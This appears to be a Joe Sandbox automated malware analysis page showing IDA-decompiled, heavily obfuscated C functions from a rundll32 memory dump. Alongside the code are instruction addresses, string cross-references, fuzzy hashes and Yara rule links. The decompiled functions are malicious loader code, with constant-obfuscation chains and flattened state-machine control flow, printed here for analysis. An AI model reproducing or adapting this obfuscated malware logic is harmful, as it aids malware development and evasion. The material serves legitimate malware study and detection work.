				_v1160 = 0x6360;
				_v1160 = _v1160 << 0xa;
				_v1160 = _v1160 >> 0xe;
				_v1160 = _v1160 ^ 0x00005ec5;
				_v1204 = 0x5583;
				_v1204 = _v1204 ^ 0x85366cb5;
				_v1204 = _v1204 | 0x8d22480f;
				_v1204 = _v1204 + 0xffffa345;
				_v1204 = _v1204 ^ 0x8d362c42;
				_v1076 = 0x4501;
				_v1076 = _v1076 ^ 0x7eb858e4;
				_v1076 = _v1076 ^ 0x7eb84390;
				_v1176 = 0x178a;
				_v1176 = _v1176 >> 0xe;
				_v1176 = _v1176 * 0xb;
				_v1176 = _v1176 ^ 0x00005407;
				_v1196 = 0x1155;
				_v1196 = _v1196 << 0x10;
				_v1196 = _v1196 ^ 0x99db21f3;
				_v1196 = _v1196 << 8;
				_v1196 = _v1196 ^ 0x8e21cf72;
				_v1096 = 0x9447;
				_v1096 = _v1096 + 0xfffff759;
				_v1096 = _v1096 ^ 0x0000f307;
				_v1136 = 0x5f84;
				_v1136 = _v1136 | 0xcddc780f;
				_v1136 = _v1136 >> 5;
				_v1136 = _v1136 ^ 0x066ef8af;
				_v1104 = 0x8d89;
				_v1104 = _v1104 + 0xffff49e8;
				_v1104 = _v1104 ^ 0xffff9178;
				_v1060 = 0xefb9;
				_v1060 = _v1060 + 0xc1e0;
				_v1060 = _v1060 ^ 0x0001802f;
				_v1088 = 0x4e92;
				_v1088 = _v1088 / _t388;
				_v1088 = _v1088 ^ 0x00003d65;
				_v1180 = 0x8957;
				_v1180 = _v1180 ^ 0x92844c79;
				_v1180 = _v1180 >> 0xd;
				_v1180 = _v1180 + 0x6937;
				_v1180 = _v1180 ^ 0x0004ca08;
				_v1188 = 0xa977;
				_v1188 = _v1188 + 0xffff4939;
				_t389 = 0x2a;
				_v1188 = _v1188 / _t389;
				_v1188 = _v1188 + 0xff8b;
				_v1188 = _v1188 ^ 0x06195dc5;
				_v1184 = 0xd80a;
				_v1184 = _v1184 << 0xd;
				_v1184 = _v1184 | 0x4fc46678;
				_v1184 = _v1184 + 0xffff2565;
				_v1184 = _v1184 ^ 0x5fc4ec42;
				_v1144 = 0xea63;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff7a6a;
				_v1144 = _v1144 ^ 0xffff3b56;
				_v1064 = 0xbe27;
				_v1064 = _v1064 << 0xc;
				_v1064 = _v1064 ^ 0x0be2654a;
				_v1100 = 0x1945;
				_v1100 = _v1100 ^ 0xac55a11c;
				_v1100 = _v1100 ^ 0xac55a0be;
				_v1156 = 0x9792;
				_v1156 = _v1156 << 3;
				_v1156 = _v1156 + 0xffff9949;
				_v1156 = _v1156 ^ 0x00042150;
				_v1124 = 0x4510;
				_v1124 = _v1124 + 0xffff8613;
				_v1124 = _v1124 | 0x934ed599;
				_v1124 = _v1124 ^ 0xffffb057;
				_v1208 = 0xd7d3;
				_t390 = 0x4a;
				_v1208 = _v1208 * 0x29;
				_v1208 = _v1208 << 7;
				_v1208 = _v1208 | 0x9b57b5c9;
				_v1208 = _v1208 ^ 0x9b5f9b7a;
				_v1164 = 0x3cc8;
				_v1164 = _v1164 + 0xffff7a64;
				_v1164 = _v1164 + 0xffff31bf;
				_v1164 = _v1164 ^ 0xfffea90e;
				_v1092 = 0xe652;
				_v1092 = _v1092 << 0xf;
				_v1092 = _v1092 ^ 0x732967ec;
				_v1200 = 0xc0e1;
				_v1200 = _v1200 ^ 0xc04a3a1a;
				_v1200 = _v1200 | 0x7efbebea;
				_v1200 = _v1200 ^ 0xfefb9216;
				_v1192 = 0x2d8c;
				_v1192 = _v1192 >> 7;
				_v1192 = _v1192 ^ 0x302961fe;
				_v1192 = _v1192 << 0xf;
				_v1192 = _v1192 ^ 0xb0d2939c;
				_v1132 = 0xbcbe;
				_v1132 = _v1132 | 0x9a03aa26;
				_v1132 = _v1132 << 4;
				_v1132 = _v1132 ^ 0xa03bfed3;
				_v1068 = 0x5b9d;
				_v1068 = _v1068 / _t390;
				_v1068 = _v1068 ^ 0x00000144;
				_v1172 = 0x2743;
				_v1172 = _v1172 >> 9;
				_v1172 = _v1172 + 0x7fd0;
				_v1172 = _v1172 ^ 0x00002a87;
				_v1116 = 0x6969;
				_t391 = 0x76;
				_v1116 = _v1116 / _t391;
				_v1116 = _v1116 << 0xa;
				_v1116 = _v1116 ^ 0x0003c98c;
				_v1212 = 0xb804;
				_v1212 = _v1212 + 0xffff4ff5;
				_v1212 = _v1212 << 0xd;
				_v1212 = _v1212 + 0x7e88;
				_v1212 = _v1212 ^ 0x00ffdfa3;
				_v1084 = 0x6753;
				_v1084 = _v1084 | 0x97d0336a;
				_v1084 = _v1084 ^ 0x97d00d97;
				_v1148 = 0xef82;
				_v1148 = _v1148 >> 2;
				_v1148 = _v1148 << 2;
				_v1148 = _v1148 ^ 0x0000cb2e;
				_v1112 = 0x5852;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0xfa80e3bf;
				_v1112 = _v1112 ^ 0xfa8084b8;
				_v1120 = 0x62fa;
				_v1120 = _v1120 >> 0xa;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0x000065d7;
				_t384 = _v1056;
				_v1128 = 0x8139;
				_v1128 = _v1128 + 0xffff21ec;
				_v1128 = _v1128 ^ 0xad93553f;
				_v1128 = _v1128 ^ 0x526c8c2f;
				_v1080 = 0x16f9;
				_v1080 = _v1080 + 0xffffafc8;
				_v1080 = _v1080 ^ 0xffff87da;
				_v1216 = 0xd107;
				_v1216 = _v1216 << 0xa;
				_v1216 = _v1216 >> 0xb;
				_v1216 = _v1216 | 0x40b78e0e;
				_v1216 = _v1216 ^ 0x40b7ee8e;
				while(1) {
					L1:
					_t392 = 0x5c;
					while(1) {
						L2:
						_t365 = 0x201e73d8;
						do {
							L3:
							if(_t427 == 0xb9056ba) {
								_push(_v1176);
								_t366 = E00B3889D(0xb3c930, _v1076, __eflags);
								_t368 =  *0xb3ca2c; // 0x505cc8
								__eflags = _t368 + 0x230;
								_t419 =  *0xb3ca2c; // 0x505cc8
								E00B229E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
								E00B32025(_v1088, _t366, _v1180, _v1188);
								_t432 =  &(_t432[0xc]);
								_t427 = 0x176c6394;
								goto L17;
							} else {
								if(_t427 == 0x176c6394) {
									_t385 =  *0xb3ca2c; // 0x505cc8
									_t386 = _t385 + 0x230;
									while(1) {
										__eflags =  *_t386 - _t392;
										if(__eflags == 0) {
											break;
										}
										_t386 = _t386 + 2;
										__eflags = _t386;
									}
									_t384 = _t386 + 2;
									_t427 = 0x2c3250cc;
									goto L2;
								} else {
									if(_t427 == 0x1cf5a099) {
										_push(_t392);
										_push(_t392);
										E00B2C6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
										_t432 =  &(_t432[7]);
										_t427 = 0xb9056ba;
										goto L1;
									} else {
										if(_t427 == 0x1e86e44b) {
											E00B265A2(_v1052, _v1112, _v1120, _v1128, _v1080);
										} else {
											if(_t427 == _t365) {
												_t376 = E00B30ADC( &_v1040, _v1132, _v1068);
												_pop(_t399);
												_t378 = E00B21AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
												_t432 =  &(_t432[9]);
												__eflags = _t378;
												_t427 = 0x1e86e44b;
												_v1056 = 0 | __eflags == 0x00000000;
												while(1) {
													L1:
													_t392 = 0x5c;
													L2:
													_t365 = 0x201e73d8;
													goto L3;
												}
											} else {
												_t440 = _t427 - 0x2c3250cc;
												if(_t427 == 0x2c3250cc) {
													_push(_v1144);
													_t379 = E00B3889D(0xb3c9d0, _v1184, _t440);
													_pop(_t405);
													E00B33EB3(_v1064, _t405, _t379, _v1100, _v1156, 0xb3c9d0, _v1124, _v1208, 0xb3c9d0, _v1164, 0xb3c9d0, _v1140, _v1108,  &_v1052);
													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
													E00B32025(_v1092, _t379, _v1200, _v1192);
													_t432 =  &(_t432[0xf]);
													L17:
													_t365 = 0x201e73d8;
													_t392 = 0x5c;
												}
												goto L18;
											}
										}
									}
								}
							}
							L21:
							return _v1056;
							L18:
						} while (_t427 != 0x22b0460c);
						goto L21;
					}
				}
			}

0x00b26d9f
0x00b26da5
0x00b26db2
0x00b26dbb
0x00b26dc3
0x00b26dcb
0x00b26dd0
0x00b26dd8
0x00b26de0
0x00b26de5
0x00b26ded
0x00b26df5
0x00b26dfd
0x00b26e05
0x00b26e0d
0x00b26e19
0x00b26e20
0x00b26e2b
0x00b26e30
0x00b26e36
0x00b26e3e
0x00b26e46
0x00b26e59
0x00b26e5a
0x00b26e61
0x00b26e6c
0x00b26e74
0x00b26e79
0x00b26e7e
0x00b26e86
0x00b26e8e
0x00b26e96
0x00b26e9e
0x00b26ea6
0x00b26eae
0x00b26eb9
0x00b26ec4
0x00b26ecf
0x00b26ed7
0x00b26ee1
0x00b26ee5
0x00b26eed
0x00b26ef5
0x00b26efa
0x00b26f02
0x00b26f07
0x00b26f0f
0x00b26f1a
0x00b26f25
0x00b26f30
0x00b26f38
0x00b26f40
0x00b26f45
0x00b26f4d
0x00b26f58
0x00b26f63
0x00b26f6e
0x00b26f79
0x00b26f84
0x00b26f8f
0x00b26fa3
0x00b26faa
0x00b26fb5
0x00b26fbd
0x00b26fc5
0x00b26fca
0x00b26fd2
0x00b26fda
0x00b26fe4
0x00b26ff2
0x00b26ff7
0x00b26ffd
0x00b27005
0x00b2700d
0x00b27015
0x00b2701a
0x00b27022
0x00b2702a
0x00b27032
0x00b2703a
0x00b2703f
0x00b27047
0x00b2704f
0x00b2705a
0x00b27062
0x00b2706d
0x00b27078
0x00b27083
0x00b2708e
0x00b27096
0x00b2709b
0x00b270a3
0x00b270ab
0x00b270b3
0x00b270bb
0x00b270c3
0x00b270cb
0x00b270d8
0x00b270db
0x00b270df
0x00b270e4
0x00b270ec
0x00b270f4
0x00b270fc
0x00b27104
0x00b2710c
0x00b27114
0x00b2711f
0x00b27127
0x00b27132
0x00b2713a
0x00b27142
0x00b2714a
0x00b27152
0x00b2715a
0x00b2715f
0x00b27167
0x00b2716c
0x00b27174
0x00b2717c
0x00b27184
0x00b27189
0x00b27191
0x00b271a7
0x00b271ae
0x00b271b9
0x00b271c1
0x00b271c6
0x00b271ce
0x00b271d6
0x00b271e2
0x00b271e5
0x00b271e9
0x00b271ee
0x00b271f6
0x00b271fe
0x00b2720b
0x00b27210
0x00b27218
0x00b27220
0x00b2722b
0x00b27236
0x00b27241
0x00b27249
0x00b2724e
0x00b27253
0x00b2725b
0x00b27263
0x00b27268
0x00b27270
0x00b27278
0x00b27280
0x00b27285
0x00b2728a
0x00b27292
0x00b27299
0x00b272a1
0x00b272a9
0x00b272b1
0x00b272b9
0x00b272c4
0x00b272cf
0x00b272da
0x00b272e2
0x00b272e7
0x00b272ec
0x00b272f4
0x00b272fc
0x00b272fc
0x00b272fe
0x00b272ff
0x00b272ff
0x00b272ff
0x00b27304
0x00b27304
0x00b2730a
0x00b27487
0x00b27497
0x00b274bb
0x00b274c0
0x00b274d5
0x00b274e1
0x00b274f7
0x00b274fc
0x00b274ff
0x00000000
0x00b27310
0x00b27316
0x00b27467
0x00b2746d
0x00b27478
0x00b27478
0x00b2747b
0x00000000
0x00000000
0x00b27475
0x00b27475
0x00b27475
0x00b2747d
0x00b27480
0x00000000
0x00b2731c
0x00b27322
0x00b27433
0x00b27434
0x00b27455
0x00b2745a
0x00b2745d
0x00000000
0x00b27328
0x00b2732e
0x00b27537
0x00b27334
0x00b27336
0x00b273d6
0x00b273db
0x00b27413
0x00b2741a
0x00b2741d
0x00b2741f
0x00b27427
0x00b272fc
0x00b272fc
0x00b272fe
0x00b272ff
0x00b272ff
0x00000000
0x00b272ff
0x00b2733c
0x00b2733c
0x00b2733e
0x00b27344
0x00b27351
0x00b27356
0x00b27392
0x00b273b4
0x00b273b7
0x00b273bc
0x00b27504
0x00b27506
0x00b2750b
0x00b2750b
0x00000000
0x00b2733e
0x00b27336
0x00b2732e
0x00b27322
0x00b27316
0x00b2753f
0x00b27550
0x00b2750c
0x00b2750c
0x00000000
0x00b27518
0x00b272ff

Strings

RX, xrefs: 00B2725B
7i, xrefs: 00B26FCA
), xrefs: 00B26DD0
c, xrefs: 00B27032
6oD, xrefs: 00B26DA5
`c, xrefs: 00B26E6C
Sg, xrefs: 00B27220
C', xrefs: 00B271B9
g)s, xrefs: 00B27127
"D, xrefs: 00B26DC3
<], xrefs: 00B26E3E

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
API String ID: 1514166925-3192994148
Opcode ID: 6ff83c7431032626c1f8d10aa82aaba85bbb83cc789813ea56e22a185370fb6b
Instruction ID: 07778a9409e0a44dfa4840ea03dec1db0dd7f5e06fd58b816c54caaae1595eed
Opcode Fuzzy Hash: 6ff83c7431032626c1f8d10aa82aaba85bbb83cc789813ea56e22a185370fb6b
Instruction Fuzzy Hash: 630214725087809FE3A5CF65D84AA4BBBE1FBC5748F10891CF1D9862A0DBB58909CF07

Uniqueness

Uniqueness Score: -1.00%

Function 00B2BB3A, Relevance: 14.0, Strings: 11, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00B2BB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t284;
				signed int _t317;
				void* _t322;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				intOrPtr _t357;
				signed int* _t360;

				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t284 = E00B2602B(0);
				_v72 = _t284;
				_t357 = _t284;
				_v176 = 0x3707;
				_t360 =  &(( &_v188)[9]);
				_v176 = _v176 << 3;
				_t322 = 0x3701c77e;
				_t349 = 0x1b;
				_v176 = _v176 * 0x3b;
				_v176 = _v176 ^ 0x9e3c13fc;
				_v176 = _v176 ^ 0x9e596314;
				_v152 = 0x78a7;
				_v152 = _v152 + 0x292e;
				_v152 = _v152 << 3;
				_v152 = _v152 ^ 0x00050e88;
				_v180 = 0xd511;
				_v180 = _v180 ^ 0x1d80f702;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xe181230f;
				_v180 = _v180 ^ 0xe905cae0;
				_v92 = 0xc43e;
				_v92 = _v92 + 0xffff1ae3;
				_v92 = _v92 ^ 0xffffb82c;
				_v104 = 0x4365;
				_v104 = _v104 >> 5;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x000066ec;
				_v172 = 0xf4f1;
				_v172 = _v172 + 0x10b4;
				_v172 = _v172 + 0xffffc378;
				_v172 = _v172 / _t349;
				_v172 = _v172 ^ 0x000074e7;
				_v116 = 0x37b8;
				_v116 = _v116 + 0xffff57e4;
				_v116 = _v116 + 0xb626;
				_v116 = _v116 ^ 0x0000140c;
				_v144 = 0xb795;
				_t350 = 0x49;
				_v144 = _v144 * 0x50;
				_v144 = _v144 / _t350;
				_v144 = _v144 ^ 0x000091bc;
				_v76 = 0x1dd7;
				_t351 = 0x1c;
				_v76 = _v76 * 0x75;
				_v76 = _v76 ^ 0x000d9fef;
				_v108 = 0xced7;
				_v108 = _v108 >> 5;
				_v108 = _v108 / _t351;
				_v108 = _v108 ^ 0x00005a08;
				_v136 = 0x2b88;
				_v136 = _v136 ^ 0x78d809e4;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x0001f73d;
				_v164 = 0x766d;
				_v164 = _v164 >> 1;
				_v164 = _v164 + 0xffffabb8;
				_t352 = 0x72;
				_v164 = _v164 * 0x5c;
				_v164 = _v164 ^ 0xfff6cd9c;
				_v168 = 0x718b;
				_v168 = _v168 ^ 0xcaa0facc;
				_v168 = _v168 ^ 0xed5841e4;
				_t112 =  &_v168; // 0xed5841e4
				_v168 =  *_t112 * 0x1f;
				_v168 = _v168 ^ 0xd720c943;
				_v100 = 0x3093;
				_v100 = _v100 << 8;
				_v100 = _v100 * 0x6e;
				_v100 = _v100 ^ 0x14df3334;
				_v80 = 0xaa77;
				_v80 = _v80 | 0xec49ccd9;
				_v80 = _v80 ^ 0xec49f00b;
				_v184 = 0x6ab1;
				_v184 = _v184 << 0x10;
				_v184 = _v184 + 0x7c9;
				_v184 = _v184 + 0xb8a8;
				_v184 = _v184 ^ 0x6ab1ec4b;
				_v96 = 0xf4af;
				_v96 = _v96 * 0x3a;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00007d4d;
				_v188 = 0xb63a;
				_v188 = _v188 ^ 0x365cf355;
				_v188 = _v188 << 2;
				_v188 = _v188 + 0xd6ce;
				_v188 = _v188 ^ 0xd971d569;
				_v120 = 0xab3a;
				_v120 = _v120 * 0x32;
				_v120 = _v120 / _t352;
				_v120 = _v120 ^ 0x00002a91;
				_v156 = 0xadc6;
				_v156 = _v156 >> 9;
				_v156 = _v156 + 0xffff5d43;
				_v156 = _v156 ^ 0xffff767e;
				_v128 = 0x4e26;
				_t353 = 0x54;
				_v128 = _v128 / _t353;
				_v128 = _v128 ^ 0xbd5b2ebf;
				_v128 = _v128 ^ 0xbd5b3d92;
				_v112 = 0x5bd4;
				_v112 = _v112 | 0xfffbefdf;
				_v112 = _v112 ^ 0xfffb9ace;
				_v88 = 0x9c25;
				_v88 = _v88 | 0xd782555b;
				_v88 = _v88 ^ 0xd782aa4a;
				_v140 = 0x1cfa;
				_v140 = _v140 >> 1;
				_t354 = 0x5d;
				_v140 = _v140 / _t354;
				_v140 = _v140 ^ 0x0000306c;
				_v148 = 0xedd7;
				_v148 = _v148 ^ 0xabf54283;
				_t355 = 0x30;
				_v148 = _v148 / _t355;
				_v148 = _v148 ^ 0x03952150;
				_v124 = 0xb354;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 + 0x3a29;
				_v124 = _v124 ^ 0x0000d052;
				_v132 = 0x3532;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 | 0xce8e7aaf;
				_v132 = _v132 ^ 0xce8e32c4;
				_v160 = 0x7409;
				_v160 = _v160 | 0x6d9a42b1;
				_v160 = _v160 + 0xffff6faf;
				_v160 = _v160 >> 2;
				_v160 = _v160 ^ 0x1b6641d5;
				_v84 = 0xb2d5;
				_v84 = _v84 * 0x47;
				_v84 = _v84 ^ 0x0031fe78;
				do {
					while(_t322 != 0x94ffda2) {
						if(_t322 == 0x11e75ef4) {
							_t317 = E00B22833(_v180,  &_v72, _v92, _a8, _v104, _v172);
							_t360 =  &(_t360[5]);
							__eflags = _t317;
							if(_t317 != 0) {
								_t322 = 0x94ffda2;
								continue;
							}
						} else {
							if(_t322 == 0x3336903c) {
								E00B3337D(_v124, _v72, _v132, _v160, _v84);
							} else {
								if(_t322 != 0x3701c77e) {
									goto L9;
								} else {
									_t322 = 0x11e75ef4;
									continue;
								}
							}
						}
						L12:
						return _t357;
					}
					E00B393A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
					_push(_v164);
					_v68 = 0x44;
					_v60 = E00B3889D(0xb3c000, _v136, __eflags);
					__eflags = _v152 | _v176;
					_t357 = E00B27AB1(_v168, _a16, 0xb3c000, 0xb3c000, _v152 | _v176, _v100, 0xb3c000, 0xb3c000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
					E00B32025(_v88, _v60, _v140, _v148);
					_t360 =  &(_t360[0x1a]);
					_t322 = 0x3336903c;
					L9:
					__eflags = _t322 - 0x294b0e13;
				} while (_t322 != 0x294b0e13);
				goto L12;
			}

0x00b2bb44
0x00b2bb4d
0x00b2bb4e
0x00b2bb55
0x00b2bb5c
0x00b2bb63
0x00b2bb6a
0x00b2bb6b
0x00b2bb6c
0x00b2bb6d
0x00b2bb72
0x00b2bb79
0x00b2bb7b
0x00b2bb83
0x00b2bb86
0x00b2bb92
0x00b2bb99
0x00b2bb9c
0x00b2bba0
0x00b2bba8
0x00b2bbb0
0x00b2bbb8
0x00b2bbc0
0x00b2bbc5
0x00b2bbcd
0x00b2bbd5
0x00b2bbdd
0x00b2bbe2
0x00b2bbea
0x00b2bbf2
0x00b2bbfa
0x00b2bc02
0x00b2bc0a
0x00b2bc12
0x00b2bc17
0x00b2bc1c
0x00b2bc24
0x00b2bc2c
0x00b2bc34
0x00b2bc44
0x00b2bc48
0x00b2bc50
0x00b2bc58
0x00b2bc60
0x00b2bc68
0x00b2bc70
0x00b2bc7d
0x00b2bc80
0x00b2bc8c
0x00b2bc90
0x00b2bc98
0x00b2bcab
0x00b2bcac
0x00b2bcb3
0x00b2bcbe
0x00b2bcc6
0x00b2bcd1
0x00b2bcd5
0x00b2bcdd
0x00b2bce5
0x00b2bced
0x00b2bcf2
0x00b2bcfc
0x00b2bd04
0x00b2bd08
0x00b2bd17
0x00b2bd1a
0x00b2bd1e
0x00b2bd26
0x00b2bd2e
0x00b2bd36
0x00b2bd3e
0x00b2bd43
0x00b2bd47
0x00b2bd4f
0x00b2bd57
0x00b2bd61
0x00b2bd65
0x00b2bd6d
0x00b2bd78
0x00b2bd83
0x00b2bd8e
0x00b2bd96
0x00b2bd9b
0x00b2bda3
0x00b2bdab
0x00b2bdb3
0x00b2bdc0
0x00b2bdc4
0x00b2bdc9
0x00b2bdd1
0x00b2bdd9
0x00b2bde1
0x00b2bde6
0x00b2bdee
0x00b2bdf6
0x00b2be03
0x00b2be0f
0x00b2be13
0x00b2be1b
0x00b2be23
0x00b2be28
0x00b2be30
0x00b2be38
0x00b2be44
0x00b2be49
0x00b2be4f
0x00b2be57
0x00b2be5f
0x00b2be67
0x00b2be6f
0x00b2be77
0x00b2be7f
0x00b2be87
0x00b2be8f
0x00b2be97
0x00b2be9f
0x00b2bea4
0x00b2beaa
0x00b2beb2
0x00b2beba
0x00b2bec6
0x00b2bec9
0x00b2bed2
0x00b2bedf
0x00b2beec
0x00b2bef4
0x00b2befc
0x00b2bf04
0x00b2bf0c
0x00b2bf11
0x00b2bf19
0x00b2bf21
0x00b2bf29
0x00b2bf31
0x00b2bf39
0x00b2bf3e
0x00b2bf46
0x00b2bf53
0x00b2bf57
0x00b2bf5f
0x00b2bf5f
0x00b2bf65
0x00b2bf9e
0x00b2bfa3
0x00b2bfa6
0x00b2bfa8
0x00b2bfae
0x00000000
0x00b2bfae
0x00b2bf67
0x00b2bf69
0x00b2c0b1
0x00b2bf6f
0x00b2bf75
0x00000000
0x00b2bf7b
0x00b2bf7b
0x00000000
0x00b2bf7b
0x00b2bf75
0x00b2bf69
0x00b2c0ba
0x00b2c0c5
0x00b2c0c5
0x00b2bfcf
0x00b2bfd4
0x00b2bfe1
0x00b2bff4
0x00b2c054
0x00b2c06b
0x00b2c082
0x00b2c087
0x00b2c08a
0x00b2c08c
0x00b2c08c
0x00b2c08c
0x00000000

Strings

tI, xrefs: 00B2BC3C
t, xrefs: 00B2BF21
):, xrefs: 00B2BEF4
D, xrefs: 00B2BFE1
f, xrefs: 00B2BC1C
AX, xrefs: 00B2BD3E
25, xrefs: 00B2BF04
l0, xrefs: 00B2BEAA
.), xrefs: 00B2BBB8
t, xrefs: 00B2BC48
M}, xrefs: 00B2BDC9

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
API String ID: 0-3778435269
Opcode ID: 87dfa0f863b63c3023d826835c77944be8fd5c97bba82b189096da6e84be5d42
Instruction ID: 7381bf221fa2b25eb68fe431b89542ed0ce9089973081bf852d2050633c33492
Opcode Fuzzy Hash: 87dfa0f863b63c3023d826835c77944be8fd5c97bba82b189096da6e84be5d42
Instruction Fuzzy Hash: ECD100715083819FE364CF65C889A1FFBE1BBC4758F208A1DF29A96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B38F49, Relevance: 12.7, Strings: 10, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00B38F49() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t245;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t258;
				void* _t264;
				intOrPtr _t282;
				void* _t286;
				signed int* _t290;

				_t290 =  &_v1144;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x4ebe6;
				_v1128 = 0x778f;
				_v1128 = _v1128 | 0xa1323825;
				_t249 = 0x13;
				_v1128 = _v1128 / _t249;
				_v1128 = _v1128 << 2;
				_t286 = 0x35c963e4;
				_v1128 = _v1128 ^ 0x21ef9208;
				_v1052 = 0x4cd;
				_v1052 = _v1052 | 0x68cff677;
				_v1052 = _v1052 ^ 0x68cf93fd;
				_v1092 = 0x77ae;
				_v1092 = _v1092 >> 0xa;
				_v1092 = _v1092 ^ 0x00005fc7;
				_v1060 = 0x2f45;
				_v1060 = _v1060 | 0xa1a9613d;
				_v1060 = _v1060 ^ 0xa1a96f30;
				_v1096 = 0x6d0d;
				_v1096 = _v1096 << 2;
				_v1096 = _v1096 | 0xf85e23e8;
				_v1096 = _v1096 ^ 0xf85f94d5;
				_v1136 = 0xe906;
				_t250 = 0x4b;
				_v1136 = _v1136 * 0x76;
				_v1136 = _v1136 + 0x8e3a;
				_v1136 = _v1136 << 8;
				_v1136 = _v1136 ^ 0x6bf6f1e6;
				_v1104 = 0x5e2e;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 * 0x2c;
				_v1104 = _v1104 ^ 0x0000496b;
				_v1144 = 0xf2e9;
				_v1144 = _v1144 + 0xd50c;
				_v1144 = _v1144 / _t250;
				_v1144 = _v1144 ^ 0x9fddb036;
				_v1144 = _v1144 ^ 0x9fdde12f;
				_v1108 = 0x6902;
				_v1108 = _v1108 | 0xfbe10d26;
				_v1108 = _v1108 * 0x44;
				_v1108 = _v1108 ^ 0xe7e09cc2;
				_v1120 = 0xf3f1;
				_v1120 = _v1120 + 0xffff8a4f;
				_v1120 = _v1120 >> 6;
				_v1120 = _v1120 * 0x67;
				_v1120 = _v1120 ^ 0x0000b01d;
				_v1088 = 0xb368;
				_v1088 = _v1088 + 0x9734;
				_v1088 = _v1088 ^ 0x00010c20;
				_v1076 = 0x650d;
				_v1076 = _v1076 ^ 0x0544b8d8;
				_v1076 = _v1076 ^ 0x054483f2;
				_v1056 = 0xabff;
				_v1056 = _v1056 ^ 0x935518d0;
				_v1056 = _v1056 ^ 0x9355abf6;
				_v1068 = 0xb772;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00028ed1;
				_v1124 = 0xbc7e;
				_v1124 = _v1124 * 0x39;
				_v1124 = _v1124 + 0x3dff;
				_v1124 = _v1124 ^ 0x966a7207;
				_v1124 = _v1124 ^ 0x9640526c;
				_v1132 = 0xba5f;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 << 5;
				_t251 = 0x75;
				_v1132 = _v1132 / _t251;
				_v1132 = _v1132 ^ 0x0197c6fa;
				_v1140 = 0x5fea;
				_t252 = 0x3c;
				_v1140 = _v1140 * 0xa;
				_v1140 = _v1140 * 0x2d;
				_v1140 = _v1140 >> 2;
				_v1140 = _v1140 ^ 0x002a725f;
				_v1100 = 0x79ec;
				_v1100 = _v1100 << 8;
				_v1100 = _v1100 ^ 0x69f808d7;
				_v1100 = _v1100 ^ 0x69818172;
				_v1084 = 0xd5eb;
				_v1084 = _v1084 ^ 0xb139babe;
				_v1084 = _v1084 ^ 0xb1392951;
				_v1072 = 0x4dbe;
				_v1072 = _v1072 ^ 0x00003bef;
				_v1080 = 0x7ef4;
				_v1080 = _v1080 / _t252;
